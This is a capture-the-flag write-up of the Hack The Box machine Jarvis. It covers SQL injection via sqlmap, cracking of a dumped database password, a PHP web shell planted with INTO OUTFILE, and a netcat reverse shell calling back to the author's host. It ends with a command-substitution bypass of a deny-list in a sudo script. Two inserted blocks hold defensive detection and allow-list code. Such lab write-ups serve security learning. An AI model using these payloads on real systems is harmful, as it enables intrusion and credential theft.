Hack The Box Jarvis Writeup – 10.10.10.143

Hack The Box Jarvis is built around an SQL injection vulnerability in a hotel room booking web application. WAF, SQL injection, systemctl, and SUID root are the keys to root this machine.

As with any other machine, I add the IP 10.10.10.143 as jarvis.htb to /etc/hosts.

Let's start with an nmap port scan.

 ⚡ ⚙  root@ns09 ~/htb/jarvis nmap -sC -sV -p- jarvis.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-18 14:29 +03
Nmap scan report for jarvis.htb (10.10.10.143)
Host is up (0.024s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
|   256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_  256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
64999/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are a couple of ports open: 22, 80 and 64999. Port 22 hosts SSH, port 80 an Apache httpd web server that runs our main target, the Hotel Room Booking application, and port 64999 hosts another Apache server; this port seems to ban whoever visits it for 90 seconds.

PORT 80:

PORT 64999:

I started enumerating directories with DirBuster to find something useful. I found a lot of directories and analyzed them one by one until I decided to test for SQLi against the back-end SQL database. Some users in the Jarvis forum posts say room.php is the SQLi point, so I started sqlmap against it.

 ⚡ ⚙ root@ns09 ~/htb/jarvis sqlmap -u http://jarvis.htb/room.php\?cod\=1 -p cod
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.3.10#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:29:18 /2019-11-18/

[16:29:19] [INFO] testing connection to the target URL
[16:29:20] [INFO] checking if the target is protected by some kind of WAF/IPS
[16:29:20] [INFO] testing if the target URL content is stable
[16:29:21] [INFO] target URL content is stable
[16:29:21] [WARNING] heuristic (basic) test shows that GET parameter 'cod' might not be injectable
[16:29:22] [INFO] testing for SQL injection on GET parameter 'cod'
[16:29:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:29:24] [INFO] GET parameter 'cod' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="of")
[16:29:26] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[16:30:11] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[16:30:11] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[16:30:11] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[16:30:11] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[16:30:11] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[16:30:11] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[16:30:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:30:12] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:30:12] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:30:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:30:12] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[16:30:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[16:30:12] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:30:13] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[16:30:13] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[16:30:13] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:30:13] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[16:30:13] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[16:30:14] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[16:30:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[16:30:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[16:30:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[16:30:14] [INFO] testing 'MySQL inline queries'
[16:30:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[16:30:15] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:30:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[16:30:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[16:30:15] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[16:30:15] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[16:30:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[16:30:26] [INFO] GET parameter 'cod' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[16:30:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:30:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[16:30:26] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[16:30:27] [INFO] target URL appears to have 7 columns in query
[16:30:30] [INFO] GET parameter 'cod' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'cod' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests:
---
Parameter: cod (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cod=1 AND 5750=5750

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cod=1 AND (SELECT 5829 FROM (SELECT(SLEEP(5)))UakE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: cod=-4520 UNION ALL SELECT NULL,NULL,CONCAT(0x716b707171,0x435465546e7a7764534e7877457043504c4362537255516159586c66615154756d51617254794d6c,0x716b767a71),NULL,NULL,NULL,NULL-- KhJh
---
[16:51:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: PHP, Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[16:51:41] [INFO] fetched data logged to text files under '/root/.sqlmap/output/jarvis.htb'

[*] ending @ 16:51:41 /2019-11-18/

 ⚡ ⚙ root@ns09~/htb/jarvis 

The SQLi is confirmed by the scan above. I now know that the following SQLi techniques are possible on this machine.

Possible SQLi as per sqlmap scan report:

sqlmap command: sqlmap -u http://jarvis.htb/room.php?cod=1 -p cod --delay 2 --random-agent --os-pwn

Parameter: cod (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cod=1 AND 5750=5750

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cod=1 AND (SELECT 5829 FROM (SELECT(SLEEP(5)))UakE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: cod=-4520 UNION ALL SELECT NULL,NULL,CONCAT(0x716b707171,0x435465546e7a7764534e7877457043504c4362537255516159586c66615154756d51617254794d6c,0x716b767a71),NULL,NULL,NULL,NULL-- KhJh
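As an added example (not from the original writeup), the three payloads sqlmap reported above are replayed against constructed Apache access-log lines, so a defender can see what these probes look like in the web server log and flag the source; the rule names and helper functions are chosen here and are not sqlmap's.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined-log style, sizes and times made up).
# Lines 2-4 carry the three payloads sqlmap reported for the cod parameter;
# the long hex string in the UNION payload is shortened to keep the sample readable.
SAMPLE_LOG = """\
10.10.14.9 - - [18/Nov/2019:16:29:22 +0300] "GET /room.php?cod=1 HTTP/1.1" 200 5301
10.10.14.9 - - [18/Nov/2019:16:29:24 +0300] "GET /room.php?cod=1%20AND%205750%3D5750 HTTP/1.1" 200 5301
10.10.14.9 - - [18/Nov/2019:16:30:16 +0300] "GET /room.php?cod=1%20AND%20(SELECT%205829%20FROM%20(SELECT(SLEEP(5)))UakE) HTTP/1.1" 200 5301
10.10.14.9 - - [18/Nov/2019:16:30:30 +0300] "GET /room.php?cod=-4520%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x716b707171,0x4354,0x716b767a71),NULL,NULL,NULL,NULL--%20KhJh HTTP/1.1" 200 5301
10.10.14.9 - - [18/Nov/2019:16:31:02 +0300] "GET /images/logo.png HTTP/1.1" 200 11234
"""

# Minimal parser for the fields we need from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is applied to the URL-decoded value of every query parameter.
# The names are ours; they mirror the technique names sqlmap printed above.
RULES = [
    ("union-select", re.compile(r'\bUNION\b\s+(ALL\s+)?SELECT\b', re.I)),
    ("time-based", re.compile(r'\b(SLEEP|BENCHMARK)\s*\(', re.I)),
    ("boolean-tautology", re.compile(r'\b(AND|OR)\s+(\d+)\s*=\s*\2\b', re.I)),
    ("comment-terminator", re.compile(r'(--\s|#|/\*)')),
]

def analyse_line(line):
    """Parse one log line; return (ip, path, [(param, (rule, ...)), ...]) or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    findings = []
    # parse_qsl already URL-decodes, so "1%20AND%205750%3D5750" becomes "1 AND 5750=5750"
    for param, value in parse_qsl(url.query, keep_blank_values=True):
        hits = tuple(name for name, rx in RULES if rx.search(value))
        if hits:
            findings.append((param, hits))
    return m.group("ip"), url.path, findings

def scan_log(text):
    """Return one (ip, path, param, hits) tuple per request that trips at least one rule."""
    alerts = []
    for line in text.splitlines():
        parsed = analyse_line(line)
        if parsed is None:
            continue
        ip, path, findings = parsed
        for param, hits in findings:
            alerts.append((ip, path, param, hits))
    return alerts

def suspicious_sources(alerts, min_techniques=2):
    """Map each IP that used at least min_techniques distinct techniques to the set it used.

    A single tautology probe can be a false positive; several techniques from
    one address in a short window is the signature of an automated scanner."""
    seen = {}
    for ip, _path, _param, hits in alerts:
        seen.setdefault(ip, set()).update(hits)
    return {ip: techs for ip, techs in seen.items() if len(techs) >= min_techniques}

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, path, param, hits in found:
        print(f"{ip} {path} param={param} -> {', '.join(hits)}")
    print("scanner-like sources:", suspicious_sources(found))
```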

I'm going to use the --os-pwn option in sqlmap (the run below uses --os-shell), which gives me a shell directly.

 ⚡ ⚙  root@ns09  ~/htb/jarvis  sqlmap -u http://jarvis.htb/room.php\?cod\=1 --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0" --os-shell
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3.10#stable}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:54:20 /2019-11-18/

[19:54:20] [INFO] resuming back-end DBMS 'mysql' 
[19:54:20] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cod (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cod=1 AND 5750=5750

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cod=1 AND (SELECT 5829 FROM (SELECT(SLEEP(5)))UakE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: cod=-4520 UNION ALL SELECT NULL,NULL,CONCAT(0x716b707171,0x435465546e7a7764534e7877457043504c4362537255516159586c66615154756d51617254794d6c,0x716b767a71),NULL,NULL,NULL,NULL-- KhJh
---
[19:54:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: PHP, Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[19:54:21] [INFO] going to use a web backdoor for command prompt
[19:54:21] [INFO] fingerprinting the back-end DBMS operating system
[19:54:22] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[19:54:24] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: /var/www/html
[19:55:05] [INFO] retrieved web server absolute paths: '/images/'
[19:55:05] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[19:55:06] [INFO] the file stager has been successfully uploaded on '/var/www/html/' - http://jarvis.htb:80/tmpuzqye.php
[19:55:07] [INFO] the backdoor has been successfully uploaded on '/var/www/html/' - http://jarvis.htb:80/tmpbnmmp.php
[19:55:07] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] a
command standard output: 'www-data'
os-shell> id
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
os-shell> 

I actually found another, easier way to get a shell: the --passwords option dumps the database users' password hashes.

 ⚡ ⚙ root@ns09~/htb/jarvis sqlmap -u http://jarvis.htb/room.php\?cod\=1 --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0" --passwords
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.10#stable}
|_ -| . [)]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:58:22 /2019-11-18/

[19:58:23] [INFO] resuming back-end DBMS 'mysql' 
[19:58:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cod (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cod=1 AND 5750=5750

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cod=1 AND (SELECT 5829 FROM (SELECT(SLEEP(5)))UakE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: cod=-4520 UNION ALL SELECT NULL,NULL,CONCAT(0x716b707171,0x435465546e7a7764534e7877457043504c4362537255516159586c66615154756d51617254794d6c,0x716b767a71),NULL,NULL,NULL,NULL-- KhJh
---
[19:58:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: PHP, Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[19:58:24] [INFO] fetching database users password hashes
[19:58:25] [INFO] used SQL query returns 1 entry
[19:58:25] [INFO] used SQL query returns 1 entry
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[19:58:51] [INFO] writing hashes to a temporary file '/tmp/sqlmap_A8gTj4252/sqlmaphashes-fLOK8z.txt' 
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
[19:58:56] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[19:59:05] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] n
[19:59:10] [INFO] starting dictionary-based cracking (mysql_passwd)
[19:59:10] [INFO] starting 2 processes 
[19:59:40] [INFO] cracked password 'imissyou' for user 'DBadmin'
database management system users password hashes:
[*] DBadmin [1]:
    password hash: *2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
    clear-text password: imissyou

[20:00:39] [INFO] fetched data logged to text files under '/root/.sqlmap/output/jarvis.htb'

[*] ending @ 20:00:39 /2019-11-18/

 ⚡ ⚙ root@ns09 ~/htb/jarvis 

So I now have the user DBadmin and his password imissyou; I can use these credentials to log in to phpMyAdmin.

Now I'm going to use the SQL console to write a web shell into the web root:

SELECT "<?php system($_GET['c']); ?>" into outfile "/var/www/html/sh3ll.php"

I'm going to use the netcat OpenBSD one-liner from PayloadsAllTheThings to get a reverse shell.

Link: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-openbsd

Command:

http://jarvis.htb/sh3ll.php?c=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.9%204444%20%3E%2Ftmp%2Ff

Before requesting that URL, I opened another terminal and started a netcat listener on port 4444.

www-data@jarvis:/var/www/html$ export TERM=screen
www-data@jarvis:/var/www/html$ 

User.txt

I found user.txt in the home directory of the user pepper, but I wasn't able to read it because www-data has no rights to open it; pepper is the user who can.

www-data@jarvis:/var/www/html$ cd /home/
www-data@jarvis:/home$ ls -al
total 12
drwxr-xr-x  3 root   root   4096 Mar  2  2019 .
drwxr-xr-x 23 root   root   4096 Mar  3  2019 ..
drwxr-xr-x  4 pepper pepper 4096 Mar  5  2019 pepper
www-data@jarvis:/home$ cd pepper/
www-data@jarvis:/home/pepper$ ls -al
total 32
drwxr-xr-x 4 pepper pepper 4096 Mar  5  2019 .
drwxr-xr-x 3 root   root   4096 Mar  2  2019 ..
lrwxrwxrwx 1 root   root      9 Mar  4  2019 .bash_history -> /dev/null
-rw-r--r-- 1 pepper pepper  220 Mar  2  2019 .bash_logout
-rw-r--r-- 1 pepper pepper 3526 Mar  2  2019 .bashrc
drwxr-xr-x 2 pepper pepper 4096 Mar  2  2019 .nano
-rw-r--r-- 1 pepper pepper  675 Mar  2  2019 .profile
drwxr-xr-x 3 pepper pepper 4096 Mar  4  2019 Web
-r--r----- 1 root   pepper   33 Mar  5  2019 user.txt
www-data@jarvis:/home/pepper$ cat user.txt 
cat: user.txt: Permission denied
www-data@jarvis:/home/pepper$ 
www-data@jarvis:/home/pepper$ sudo -l
Matching Defaults entries for www-data on jarvis:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
www-data@jarvis:/home/pepper$ 
www-data@jarvis:/home/pepper$ sudo -u pepper /var/www/Admin-Utilities/simpler.py
***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/ 
                                @ironhackers.es
                                
***********************************************


********************************************************
* Simpler   -   A simple simplifier ;)                 *
* Version 1.0                                          *
********************************************************
Usage:  python3 simpler.py [options]

Options:
    -h/--help   : This help
    -s          : Statistics
    -l          : List the attackers IP
    -p          : ping an attacker IP
    
www-data@jarvis:/home/pepper$ 

The contents of simpler.py:

www-data@jarvis:/home/pepper$ cat /var/www/Admin-Utilities/simpler.py
#!/usr/bin/env python3
from datetime import datetime             
import sys               
import os 
from os import listdir               
import re        
def show_help():         
    message='''
********************************************************
* Simpler   -   A simple simplifier ;)                 *
* Version 1.0                                          *
********************************************************
Usage:  python3 simpler.py [options]
Options:
    -h/--help   : This help
    -s          : Statistics
    -l          : List the attackers IP
    -p          : ping an attacker IP                
    '''     
    print(message)

def show_header():
    print('''***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/ 
                                @ironhackers.es
***********************************************                   
''')
def show_statistics():
    path = '/home/pepper/Web/Logs/'
    print('Statistics\n-----------')
    listed_files = listdir(path)
    count = len(listed_files)
    print('Number of Attackers: ' + str(count))
    level_1 = 0
    dat = datetime(1, 1, 1)
    ip_list = []
    reks = []
    ip = ''
    req = ''
    rek = ''
    for i in listed_files:
        f = open(path + i, 'r')
        lines = f.readlines()
        level2, rek = get_max_level(lines)
        fecha, requ = date_to_num(lines)
        ip = i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3]
        if fecha > dat:
            dat = fecha
            req = requ
            ip2 = i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3]
        if int(level2) > int(level_1):
            level_1 = level2
            ip_list = [ip]
            reks=[rek]
        elif int(level2) == int(level_1):
            ip_list.append(ip)
            reks.append(rek)
        f.close()

    print('Most Risky:')
    if len(ip_list) > 1:
        print('More than 1 ip found')
    cont = 0
    for i in ip_list:
        print('    ' + i + ' - Attack Level : ' + level_1 + ' Request: ' + reks[cont])
        cont = cont + 1

    print('Most Recent: ' + ip2 + ' --> ' + str(dat) + ' ' + req)

def list_ip():
    print('Attackers\n-----------')
    path = '/home/pepper/Web/Logs/'
    listed_files = listdir(path)
    for i in listed_files:
        f = open(path + i,'r')
        lines = f.readlines()
        level,req = get_max_level(lines)
        print(i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3] + ' - Attack Level : ' + level)                                                                             
        f.close()

def date_to_num(lines):
    dat = datetime(1,1,1)
    ip = ''
    req=''
    for i in lines:
        if 'Level' in i:
            fecha=(i.split(' ')[6] + ' ' + i.split(' ')[7]).split('\n')[0]
            regex = '(\d+)-(.*)-(\d+)(.*)'
            logEx=re.match(regex, fecha).groups()
            mes = to_dict(logEx[1])
            fecha = logEx[0] + '-' + mes + '-' + logEx[2] + ' ' + logEx[3]
            fecha = datetime.strptime(fecha, '%Y-%m-%d %H:%M:%S')
            if fecha > dat:
                dat = fecha
                req = i.split(' ')[8] + ' ' + i.split(' ')[9] + ' ' + i.split(' ')[10]
    return dat, req

def to_dict(name):
    month_dict = {'Jan':'01','Feb':'02','Mar':'03','Apr':'04', 'May':'05', 'Jun':'06','Jul':'07','Aug':'08','Sep':'09','Oct':'10','Nov':'11','Dec':'12'}                                                          
    return month_dict[name]

def get_max_level(lines):
    level=0
    for j in lines:
        if 'Level' in j:
            if int(j.split(' ')[4]) > int(level):
                level = j.split(' ')[4]
                req=j.split(' ')[8] + ' ' + j.split(' ')[9] + ' ' + j.split(' ')[10]
    return level, req

def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)

if __name__ == '__main__':
    show_header()
    if len(sys.argv) != 2:
        show_help()
        exit()
    if sys.argv[1] == '-h' or sys.argv[1] == '--help':
        show_help()
        exit()
    elif sys.argv[1] == '-s':
        show_statistics()
        exit()
    elif sys.argv[1] == '-l':
        list_ip()
        exit()
    elif sys.argv[1] == '-p':
        exec_ping()
        exit()
    else:
        show_help()
        exit()
www-data@jarvis:/home/pepper$

The next step was to run the script with -p. The deny-list in exec_ping() rejects &, ;, -, `, | and ||, but not $ or parentheses, so a $(...) command substitution passes the check and is executed by os.system() as pepper; here it runs a script at /dev/shm/shell.sh that connects back to my netcat listener.

sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/ 
                                @ironhackers.es
                                
***********************************************

Enter an IP: $(/dev/shm/shell.sh)
$(/dev/shm/shell.sh)

I now have a shell as pepper on the listener:

# nc -lvnp 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.143.
Ncat: Connection from 10.10.10.143:38924.
id
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)
python -c 'import pty;pty.spawn("/bin/bash")'
pepper@jarvis:/var/www$ cd
cd
pepper@jarvis:~$ ls
pepper@jarvis:~$ cat user.txt
xxxxxxxxxxxxxxxxxxxxxxxxxx
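As an added example (not the writeup's code and not part of simpler.py), the deny-list check that exec_ping() performs above is placed beside an allow-list replacement that only accepts a single IP address and runs ping without a shell; `denylist_allows`, `parse_target_ip`, `build_ping_argv` and `safe_ping` are names chosen here.

```python
import ipaddress
import subprocess

# The deny-list exactly as simpler.py's exec_ping() has it. Note what is
# missing from it: '$', '(', ')' and newline, which is why a $(...) command
# substitution reaches os.system() untouched.
FORBIDDEN = ['&', ';', '-', '`', '||', '|']

def denylist_allows(user_input):
    """Mirror exec_ping()'s check: True when none of the forbidden substrings is present."""
    return not any(bad in user_input for bad in FORBIDDEN)

def parse_target_ip(user_input):
    """Allow-list check: the input must parse as exactly one IPv4/IPv6 address.

    Returns the normalised address string, or None for anything else, including
    an address followed by extra text (options, substitutions, stray characters)."""
    candidate = user_input.strip()
    try:
        return str(ipaddress.ip_address(candidate))
    except ValueError:
        return None

def build_ping_argv(user_input, count=1):
    """Build ping's argv as a list, so no shell ever interprets the user's input.

    Raises ValueError instead of running anything when the input is not an IP."""
    ip = parse_target_ip(user_input)
    if ip is None:
        raise ValueError("not an IP address: %r" % user_input)
    # '-c' (packet count) is the Linux/BSD ping option; adjust for other platforms.
    return ["ping", "-c", str(count), ip]

def safe_ping(user_input, count=1, timeout=15):
    """Run ping via subprocess with an argv list (shell=False) and return its exit code."""
    argv = build_ping_argv(user_input, count)
    completed = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return completed.returncode

if __name__ == "__main__":
    # Compare both checks on a benign address, a classic separator, and the
    # command substitution the writeup used.
    for sample in ["10.10.14.9", "10.10.14.9; id", "$(/dev/shm/shell.sh)"]:
        print("%-24s deny-list allows: %-5s allow-list accepts: %s" % (
            sample, denylist_allows(sample), parse_target_ip(sample) is not None))
```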

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n
